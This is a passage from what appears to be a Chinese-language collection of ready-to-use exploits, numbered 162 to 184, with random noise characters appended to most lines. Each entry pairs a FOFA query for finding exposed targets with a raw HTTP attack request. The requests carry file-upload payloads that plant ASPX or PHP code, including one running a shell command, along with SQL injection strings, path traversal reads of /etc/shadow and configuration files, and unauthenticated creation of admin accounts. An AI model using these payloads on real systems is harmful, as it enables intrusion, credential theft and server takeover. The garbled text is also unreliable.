+ e3 M4 t/ v, J$ }' w- b, bhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"$ I- z, h, j/ B. M' y5 G% \8 F7 p$ Y: S
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">3 }) s+ a, \) Q6 A1 Y8 ^5 V
<soap:Body>
+ q. A) {5 V5 t6 E D# W6 R<UploadResume xmlns="http://tempuri.org/">5 Y5 t3 T+ f" B$ G1 A4 o2 Y4 z
<ip>1</ip>
r, j: P2 M4 q ~& a" b<fileName>../../../../dizxdell.aspx</fileName>( M" [' C5 D% [& b( P3 N% B, j
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
( ~. E( T5 D K) z; ~; C- a<tag>3</tag>/ ^0 t$ J8 n6 p/ N( l5 y
</UploadResume>$ j) J+ }! \) m: D4 l% l {' N
</soap:Body>0 G) K* V% [7 j1 d
</soap:Envelope>. u9 b) ~) _% u+ k* x
( o( Z: C# r, |' D, z
. X& R: J! y4 Z5 t7 l/ p% R# O; Z7 ~
http://x.x.x.x/dizxdell.aspx3 R7 @- u @1 z% D
9 f0 p( d6 J+ Z. F
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
# I% N3 z* K( c, R0 v% N+ iFOFA: app="和丰山海-数字标牌". T* u1 H- j, Z2 T. r
POST /QH.aspx HTTP/1.12 }' { m$ s. q0 r- A+ S, _
Host: x.x.x.x. A! M2 p, E- F" P& _ P7 t3 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0! U8 @$ Z* `; g7 b4 R- Z
Connection: close
' H) n3 s3 g0 d. s UContent-Length: 583 F6 Q0 G- L+ P9 _
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
# f' N) a; u0 yAccept-Encoding: gzip0 H0 B- D* O; v9 a
% K: t: |! [1 t9 Q
------WebKitFormBoundaryeegvclmyurlotuey N; z, Q+ X/ Z4 Y5 Q! y6 e& Q
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx": ]) W; L+ [' Q3 E% H7 l
Content-Type: application/octet-stream
0 ~, Y# ^5 u1 b9 F# U j' \% }6 J7 ^% o: ? n4 ]
<% response.write("ujidwqfuuqjalgkvrpqy") %>$ |5 E! W& }+ @% W+ C; I0 ?0 z3 [
------WebKitFormBoundaryeegvclmyurlotuey
$ n* c8 c# f" e+ g3 cContent-Disposition: form-data; name="action"
% k+ i7 F3 Z1 f: Q. S2 u
! M% a1 \. U/ f ~7 l. C8 B0 Hupload: U3 f! t# K, w7 s% {. \
------WebKitFormBoundaryeegvclmyurlotuey4 h' Y2 u- ]; z6 n# t% L
Content-Disposition: form-data; name="responderId"
; }* ~! [3 [6 [' w& h# J
/ j7 _$ A Z; e f0 L% AResourceNewResponder
5 l v* C/ c/ V* ?8 F6 P% n------WebKitFormBoundaryeegvclmyurlotuey
' g t8 I7 f& F4 DContent-Disposition: form-data; name="remotePath"
9 ?' m4 l! h$ w
) v3 b) K! d' c! J- {: u+ v6 N/opt/resources
% n& y; D$ ?, M6 d: o------WebKitFormBoundaryeegvclmyurlotuey--: t7 x$ b" n* [7 b/ I& [, e3 N
8 {$ u M) j7 C! Z2 P
P( s5 G% Q. ?" y4 F( B
http://x.x.x.x/opt/resources/kjuhitjgk.aspx* g v8 F0 L: w D( x
1 o6 z* N. w/ U* ^, P163. 号卡极团分销管理系统 ue_serve.php 任意文件上传" l) u( } G" S8 I
FOFA: icon_hash="-795291075"
7 x! ~2 c* l# p+ ~. c9 y( G6 {POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1" K7 ~! \9 w3 p- y8 M1 w7 l
Host: x.x.x.x6 S- [% q; x4 h( U7 E( U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
/ f. i' o3 e4 H: l( g: LConnection: close4 _0 C7 O/ B! }( j* ^% l
Content-Length: 293; F6 I. D1 {9 i6 {
Accept: */*
% o. u1 x# a2 n* ^1 nAccept-Encoding: gzip, deflate! H8 w! i+ H+ z/ Y6 U
Accept-Language: zh-CN,zh;q=0.9
5 E/ K9 J- z/ @ MContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
- \) l" G% _& _- M1 e* f
& W2 J- y( {, C; `( w) F------iiqvnofupvhdyrcoqyuujyetjvqgocod
0 _2 \0 x" O- ^/ S( qContent-Disposition: form-data; name="name"
, S u# ?, Q0 b0 k$ v h
& l# W+ I( x) w6 x% p u6 U5 w1.php; W6 E( j% S- ]+ \3 ?' Q
------iiqvnofupvhdyrcoqyuujyetjvqgocod
* q" z1 i2 E! m" AContent-Disposition: form-data; name="upfile"; filename="1.php"
& e3 h2 ~ {# F! S' G# r9 @! UContent-Type: image/jpeg
1 u G2 x# [! U: M. l3 A9 o' q9 y, _
rvjhvbhwwuooyiioxega
1 g( A5 Q) s7 j3 {3 F1 h- q9 s------iiqvnofupvhdyrcoqyuujyetjvqgocod--
" z* O3 o; F* Q2 t* { R
% a. ^6 A8 A. C, z$ ?; ^, h: `9 r5 @% F0 m. B* O) ]3 q* B
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传$ w- P" \- `2 |
FOFA: title="智慧综合管理平台登入"& a4 u% E2 I, y/ K
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
% P8 c6 L. x) {4 jHost: x.x.x.x
9 k- @' t5 b2 R+ p5 k2 n- kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.05 r6 C9 {$ s3 T+ y
Content-Length: 288
- ^+ T/ X) ^* X3 e' i* jAccept: application/json, text/javascript, */*; q=0.010 {1 A, `, u" P" N- N1 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,$ K- c( v. D8 N# i# H
Connection: close
' ?2 \* [6 P% g$ S7 a4 mContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl' k, e$ P! F3 ]4 k
X-Requested-With: XMLHttpRequest
2 U0 j) t) v- P: n4 R5 |. JAccept-Encoding: gzip6 f1 Q3 J# m4 Y: F% F/ R
5 A8 [, v+ F2 ~. z$ {3 s------dqdaieopnozbkapjacdbdthlvtlyl$ u/ K/ M6 O3 f; l# ]
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"6 w5 T: Y- N- {2 b
Content-Type: image/jpeg
6 I7 E1 l6 R0 Y7 R$ t' i/ N: P! d5 B. A4 {# C: ?
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
. g' A O" L- a2 V( R S' L------dqdaieopnozbkapjacdbdthlvtlyl--
5 U1 t: I; R, @+ a5 k% r
1 b( R5 z' p' ^0 ]5 z! C& [
5 X8 q7 S( r9 ^6 W2 _) q4 hhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
9 W* T$ X4 m# w
; {* ^1 [4 X/ v" ^: H1 e' I165. OrangeHRM 3.3.3 SQL 注入9 k2 {' B/ i# F, @% A2 z8 |
CVE-2024-36428, m( @9 c! M+ p M- p' \
FOFA: app="OrangeHRM-产品"
) R! P, X+ I6 M8 ^URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))0 E0 q" E( O& l6 N9 l1 Z' _' P
0 t1 C7 Q" P* A. K7 I0 |; M
+ X, b6 S# a/ c5 p166. 中成科信票务管理平台SeatMapHandler SQL注入+ h0 G3 E* Z1 v; Q
FOFA:body="技术支持:北京中成科信科技发展有限公司"
0 }& {" d+ H4 j' ?/ EPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
) ?( r$ h0 E* i9 [% \Host:! o+ {7 d) F& n1 _
Pragma: no-cache
0 ^5 C7 N$ `/ a- f7 TCache-Control: no-cache
8 e1 p& M$ T& j0 O2 lUpgrade-Insecure-Requests: 1* _' F. v( ~% m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36: M0 H' X1 y: Q! p) D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) g( F* |2 [2 Y# C! ?
Accept-Encoding: gzip, deflate( O; s1 k. S; p3 N
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 L3 S, N' o1 @
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
* O- k p( i2 w0 ^7 A: rConnection: close
, g2 b5 _$ Y7 J3 E: n6 R, R% YContent-Type: application/x-www-form-urlencoded2 b, }9 [2 F& L% w' Y' n# D
Content-Length: 89# ^4 i$ w4 X% K, h
+ z7 M0 l8 @8 i7 e3 B
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
0 }; t+ ~$ N, m& B" b' G7 h: {/ _ y8 w& {3 ~' S
0 X% m2 z: |( }& h- ~% ^: P$ |8 G167. 精益价值管理系统 DownLoad.aspx任意文件读取
' S& `) t( C5 r! q( l8 h7 c: QFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
6 ~/ A; H0 ]1 X$ t! yGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.18 M# s; \* p6 B H3 s* s
Host:
0 a: K1 w7 E! t0 v( eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- E: K+ d3 w/ t2 p
Content-Type: application/x-www-form-urlencoded
3 H7 L) I1 C- z! D; uAccept-Encoding: gzip, deflate- q( e7 \; [ i: c4 S- u( p
Accept: */*
% Y4 |2 v0 Y0 V2 r" `Connection: keep-alive
8 c; S( P9 o) h3 p$ C2 V# U, {) Z
. K* i! \. D$ x+ }
% a/ b9 I# _6 I2 I8 c168. 宏景EHR OutputCode 任意文件读取
, g6 Y1 e0 }0 f% Q5 d/ e; nFOFA:app="HJSOFT-HCM"" i2 E/ o/ {4 q( m
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1. K0 o% ?% R/ R
Host: your-ip
; Z) E* l) [( f3 z. s9 X7 A) dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
/ z3 V) {4 c& H, f) g$ g& T$ }1 k7 fContent-Type: application/x-www-form-urlencoded
% c( a9 q/ D7 nConnection: close
4 }% ^1 E. g* j* ]
, V; W8 I) @8 k
' X! z8 H, ^, Q7 l3 J
" \1 y/ E$ `* |8 i+ r: h, a t- X. [169. 宏景EHR downlawbase SQL注入. e- V8 N7 ]" a9 O j
FOFA:app="HJSOFT-HCM"7 J2 k& J. U8 H% n" f: J
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.14 ]! ?' [4 ]- i0 R
Host: your-ip
- |5 t6 n% x- A2 Z! ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& ^; ]" i n# [! [9 T3 PAccept: */*
# z$ `$ y+ C; b; KAccept-Encoding: gzip, deflate
{2 L- r- j, r' ~* Q- m: VConnection: close
: P* t9 i2 _# [
+ `9 ]. U8 n/ C
5 d0 _ z* v9 k3 i
9 t* M9 G6 k% h% I1 F0 }170. 宏景EHR DisplayExcelCustomReport 任意文件读取" r; p4 I' Q1 N" ~9 I0 Z
FOFA:body="/general/sys/hjaxmanage.js"
: X5 M7 P& T' G9 k- V% DPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
$ Q* ^7 E1 v7 y" [' d0 d; Y2 nHost: balalanengliang8 V! y! }+ t% s2 F0 m% }8 n
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) {( L+ E% D. @( D
Content-Type: application/x-www-form-urlencoded
4 E$ ~: T+ N$ i) \6 s
. I4 D% ~* b; B( U+ zfilename=../webapps/ROOT/WEB-INF/web.xml
4 `3 p( J2 m0 r% O# T, X
& L( `8 x" x, N
6 e* N/ X& t9 R) d4 L0 ]171. 通天星CMSV6车载定位监控平台 SQL注入
' ^& l0 e# q$ D* TFOFA:body="/808gps/"
2 T/ R& s5 |8 J+ a9 jGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
5 U& Z* @ C8 c$ t1 gHost: your-ip
0 P$ n) e2 U8 m0 f$ S7 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
1 h* T5 g3 d; r$ @" t( FAccept: */*
: J1 ?: B$ n T, S9 B* z1 V' F0 U. y8 zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" m j* y$ i8 Y8 I! p" yAccept-Encoding: gzip, deflate
3 [" c* E; i. H) P' MConnection: close, F/ ?+ C v5 C; D8 y! F
7 u$ e# s# q8 ~! \
5 Y8 x- p: [' F0 F- r2 Y+ l
" n0 [/ K+ z% I8 `! z; X7 o$ F: C* ]3 ^172. DT-高清车牌识别摄像机任意文件读取' W# L4 ]/ v& V) ~. u/ W# W
FOFA:app="DT-高清车牌识别摄像机"2 A% Q9 m% X) X3 @
GET /../../../../etc/passwd HTTP/1.1
' |9 ^1 ~" Q$ b) F% w. fHost: your-ip
* e# ]: w# c- R7 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 l. o" K+ F& e* H6 k4 e3 P0 ^
Accept-Encoding: gzip, deflate
& O4 z, J+ [# x5 s- v0 {* B1 pAccept: */*
0 R. W. X: ~, `! DConnection: keep-alive- U3 |- V! r, K3 B% V/ P8 t- o
" W* e8 ^0 w4 |8 M
U5 X7 J5 `' ^! D) u' P; U7 D9 V
173. Check Point 安全网关任意文件读取. @( g/ p* S. k+ T# M7 r2 u3 p
CVE-2024-24919
( s; m8 O' _( _8 x) p5 |FOFA:app="Check_Point-SSL-Network-Extender"# y8 v) k7 F2 A+ l7 r4 d
POST /clients/MyCRL HTTP/1.1
" `' ~) b/ n- W0 QHost: your-ip) k: U6 M0 C% [3 `0 s
Content-Type: application/x-www-form-urlencoded
' Y& l$ `5 @+ S. w. S8 }- {' O3 ^0 [. a/ K- S; K
aCSHELL/../../../../../../../etc/shadow
6 c, `3 \8 F5 M4 R/ V
# Q" G1 R. b4 w' L- R
- c, W) K2 q, w9 N5 q; l9 z
0 ~+ E; k" |9 H* Q174. 金和OA C6 FileDownLoad.aspx 任意文件读取1 h" z+ v1 z& W
FOFA:app="金和网络-金和OA"% t" E4 Q( T0 [5 ~; S
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
h6 b& D& u) [3 m6 |% X( {Host: your-ip y0 C( E# H) J/ P4 i* X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 [+ {( l4 L L$ D7 j L4 M5 p9 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! {8 X# p* Q, N" E2 n0 W; W
Accept-Encoding: gzip, deflate, br, f, _1 p: p* J- ]0 B
Accept-Language: zh-CN,zh;q=0.9- V- `( i2 P) q
Connection: close
1 u3 l! d$ S9 d! p
$ I b( _- r' q( o% g( P' O8 ]/ w
6 F3 Q1 }9 F" K8 r5 c
2 r" a' @' m; F175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入- @) j1 w5 E' l( f9 k# N
FOFA:app="金和网络-金和OA") v7 W1 ^- q1 V# ~0 [/ X8 ? j# u
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.11 T9 B0 [8 E" z5 `
Host:5 v8 o6 L: l8 Q2 \
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; w* K- z2 u; p0 }# {! ?8 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; x! P# l A5 E/ P3 O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& c: E: \* }. @: u( D# F3 B1 k
Accept-Encoding: gzip, deflate+ t! O& g3 q8 q" C5 z4 x
Connection: close! t; Q" V1 N# b' M
Upgrade-Insecure-Requests: 1( z4 g7 e8 z2 j( f# }
+ ]2 P" x, a# ]: D& s) [5 b& i
0 h, U2 p2 }! \2 G: @3 s176. 电信网关配置管理系统 rewrite.php 文件上传) l( R. f% y+ l2 }5 l
FOFA:body="img/login_bg3.png" && body="系统登录"
r$ X: l& |$ g/ L3 z; O8 rPOST /manager/teletext/material/rewrite.php HTTP/1.1
( e1 z/ B( J3 k y) mHost: your-ip
0 \. E3 {7 `* r, wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
. M- i+ `- J$ `3 C) S$ W% VContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT7 ?% M2 j* [0 C* l+ E/ C
Connection: close: E; {8 S" y4 {6 w4 q
, K- ^/ s$ D& q) h$ [; T
------WebKitFormBoundaryOKldnDPT
: \+ W3 g! V! h6 o* b8 KContent-Disposition: form-data; name="tmp_name"; filename="test.php"
! s: K7 s5 f: G3 P o$ a7 HContent-Type: image/png
Q' }7 j& A) n* [& p. w" N 0 n* f, Y5 |; h) Z, c: i
<?php system("cat /etc/passwd");unlink(__FILE__);?>3 C" ?& l+ T+ O y+ ]' y; `
------WebKitFormBoundaryOKldnDPT
8 m* l% M2 B& o xContent-Disposition: form-data; name="uploadtime"8 A) B+ Z' w" \# G: r
5 [( `, m6 ?# j1 U5 e; N
- z& a* Q6 Q9 ^8 l* J0 ~/ a------WebKitFormBoundaryOKldnDPT--
/ Q v; E7 |* A4 P+ C3 B* }7 o3 b+ }" k% p) r
C9 [* n' `: ` E$ j z; @) g+ W+ v4 U1 @" t: y6 ]8 o6 c8 `
177. H3C路由器敏感信息泄露- J! p( j5 V4 ?( |
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg& R& O: a& H& Y
/userLogin.asp/../actionpolicy_status/../M60.cfg! ~8 @+ H3 Q. |# d: R- Y
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
7 w M6 X) h7 [# }3 R/userLogin.asp/../actionpolicy_status/../GR5200.cfg
3 R/ z- P$ U' F9 X. M/userLogin.asp/../actionpolicy_status/../GR3200.cfg p7 M+ O) z8 i4 M, ?% c) }
/userLogin.asp/../actionpolicy_status/../GR2200.cfg- F" X7 L2 S$ U* l6 U+ K; i
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg, H3 M' |; M, g! t( r$ ?
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
$ N2 {- r# \# k9 U. h) n. {( V/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg& L6 s% }- x- N# B9 V
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg* Y# G7 {5 ?3 ^5 }
/userLogin.asp/../actionpolicy_status/../ER5200.cfg( [ ^5 b7 ` F. L$ M
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
1 s- i! O1 e& @8 i3 n6 T1 @/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg8 i5 S4 Q/ I2 G% J2 |
/userLogin.asp/../actionpolicy_status/../ER3260.cfg5 r E6 u! _, D2 O5 M" e9 t
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
7 O7 L2 o* M T5 j2 i, `) E/userLogin.asp/../actionpolicy_status/../ER3200.cfg
& m6 V/ |$ ^, `8 g/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
8 h) ] j+ o5 p; n6 R' I& D/userLogin.asp/../actionpolicy_status/../ER3108G.cfg3 ^; t7 D+ Z. H7 z' d$ i) t4 A
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
' b; ?. h l3 J/userLogin.asp/../actionpolicy_status/../ER3100.cfg8 R" W$ @# [6 a% ] ^
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
. z+ a+ a @! c; B v! Q/ g
: H' v# D9 E1 o% _: a' E. e; j/ H3 S
178. H3C校园网自助服务系统-flexfileupload-任意文件上传( @) M0 G# T8 O2 w4 x9 x& J8 E
FOFA:header="/selfservice"
' z; w. ~( Q7 F; Q: G& CPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.10 F9 C0 v: o0 ]
Host:
6 B" E+ g! O+ @0 {! j) `/ P4 `& gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+ D/ }* r4 C `8 ~7 v* s6 SContent-Length: 252
& L. n2 ?' p3 `% xAccept-Encoding: gzip, deflate
% A# k; W( V+ G9 H E" }1 tConnection: close
& H" U/ h- y( i5 RContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l' V0 `" C3 Q( P1 v, X# h0 n
-----------------aqutkea7vvanpqy3rh2l
& ?8 h6 Z5 d9 ?) x. B6 G# I, ?8 uContent-Disposition: form-data; name="12234.txt"; filename="12234"8 l8 A3 M% d0 w) d/ Z; m! L% T
Content-Type: application/octet-stream
5 Y5 d. n6 w$ ]1 iContent-Length: 2556 [% z( i( e1 H) I! O: q" M d9 X( f
; `' T5 T3 T* T2 y- u: C
12234: c- m, g8 u! M, y' Y
-----------------aqutkea7vvanpqy3rh2l--2 ?. D! B3 ?8 R. H
$ n% M2 ?& b( w. G7 e& p( v! [9 k3 w6 [- \8 @/ U
GET /imc/primepush/%2e%2e/flex/12234.txt" C$ R/ K) E/ V6 B, T4 z& w
+ p% H: m8 j7 L6 }" E
# {3 G! ?9 H+ A' O: Y3 \
179. 建文工程管理系统存在任意文件读取; T M4 r5 @% c% c* w" M+ r( F! f
POST /Common/DownLoad2.aspx HTTP/1.1
# N# R" u7 z5 b2 K; l, x0 ?6 [Host: {{Hostname}}
! |( C3 `. V9 w+ VContent-Type: application/x-www-form-urlencoded
3 k1 x9 {1 p2 [8 FUser-Agent: Mozilla/5.0
- t H6 ^7 H. l: \- Q0 d1 P! }
0 d" E' u# g6 i' x3 rpath=../log4net.config&Name=
, s1 [( U( n5 T7 x2 i+ ~
6 ], }( h+ U% r, K
' S c9 z1 H, A180. 帮管客 CRM jiliyu SQL注入1 j6 Z# V$ l! k: S' @% b
FOFA:app="帮管客-CRM"% Q `! T, W7 F/ N
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
2 v" g1 s5 x$ m4 Y5 vHost: your-ip; c2 b5 r3 d& S! G; O; c+ w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. b- T$ P. u" k: A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 [' ^+ K: D2 r: `Accept-Encoding: gzip, deflate, `; t( d+ ^4 p$ H. H# I
Accept-Language: zh-CN,zh;q=0.9
* }0 d% f) g$ z' KConnection: close
$ `" L9 `: @( B1 H2 H; n! ?0 |( d* a
6 w" H5 l5 H6 m# a
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
3 ~+ ]5 I* k/ M' a8 PFOFA:"PDCA/js/_publicCom.js"
0 f& v5 f& V ~6 f3 W" KPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
$ F3 _1 a1 Q! v9 IHost: your-ip
( Q9 c- L. r- E8 E eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.364 s8 n2 z q- @! I h. C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# {+ k4 n! R" l( t4 o3 ZAccept-Encoding: gzip, deflate, br; v! i2 R( R. y# G P
Accept-Language: zh-CN,zh;q=0.9
* J) g. y' d6 h9 |" S3 DConnection: close
. V$ ]+ ^; \. L3 v* RContent-Type: application/x-www-form-urlencoded( G2 l* q* x( W
9 F+ ?+ C, D- r' F3 ^; f
7 o; C, O3 N0 `. p4 E
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
4 O! j+ u9 n* r% H% T2 z
( J# A {6 W0 R& L5 g! b- D8 C. j' I0 ^. v7 D
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建4 b/ t/ q' N# c* W* \
FOFA:"PDCA/js/_publicCom.js"
) J$ A2 J; w$ f( ]' c; ?! SPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1) B& y' K2 \3 |% _6 V
Host: your-ip
5 _, K3 @# y% k9 F" j: XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
4 f+ E: I' l9 Q/ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. j. Y K1 D# R3 m, ?3 g+ C. F% _Accept-Encoding: gzip, deflate, br" w% X0 F" [" |- F# t7 k$ v
Accept-Language: zh-CN,zh;q=0.9+ @0 t+ u' ^# j/ i2 l
Connection: close
. G/ o$ C( s S" U3 NContent-Type: application/x-www-form-urlencoded8 N% Q$ r( v/ G% Y
! i4 g/ `3 ^9 s! d+ Z, |$ Y
9 t! T1 I7 B8 | l2 }) ausername=test1234&pwd=test1234&savedays=1
8 K- F: y1 M# q% I/ l8 P7 L/ \, D" B- I# V8 x- f. ]4 S( ~
: i* o2 J# Z; @: b! [9 k$ z
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
E" R0 S, R* X! D7 q$ n( k7 j( A3 e9 fFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
3 D* h7 B$ k0 t% ^3 H# uGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
: N% I( ^+ m) LHost: your-ip
, x8 {' {8 {5 D6 |9 ?) ~! |9 P# Q5 H- rUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
5 f6 c$ Y, K8 q/ ?Accept-Charset: utf-8, ~: a; }( z. N6 }6 r; G
Accept-Encoding: gzip, deflate% O+ e5 i! X/ i9 m: X1 Z# J) V7 ~
Connection: close8 y s) N5 Z& G8 [
2 k! r& h4 X$ b; F d* @8 T6 k: ^* z* p- u+ }- x9 Q
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加" k/ n* M" C1 J% e- n8 r. x4 I/ l! `
FOFA:server="SunFull-Webs"
$ X& X' I8 _, uPOST /soap/AddUser HTTP/1.1" x. S7 Q1 M+ W- O& e0 V& _
Host: your-ip
. U+ u2 [ S/ ^: U ~7 B# k( PAccept-Encoding: gzip, deflate+ a; U$ o& h' o' V" j5 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
% e$ Q8 U# Z* X' DAccept: application/xml, text/xml, */*; q=0.01
/ Q3 E( ~% Z% mContent-Type: text/xml; charset=utf-8
, j9 Y- m4 {7 v1 H+ y6 e/ B: c8 aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 ?. P8 p: i1 Y1 L' I* iX-Requested-With: XMLHttpRequest. }( J# m8 G9 o! b7 m6 r
4 q$ q0 X; z2 E4 _+ ~$ ~3 b) a: ^; y8 C& g; G2 {" f0 r9 L
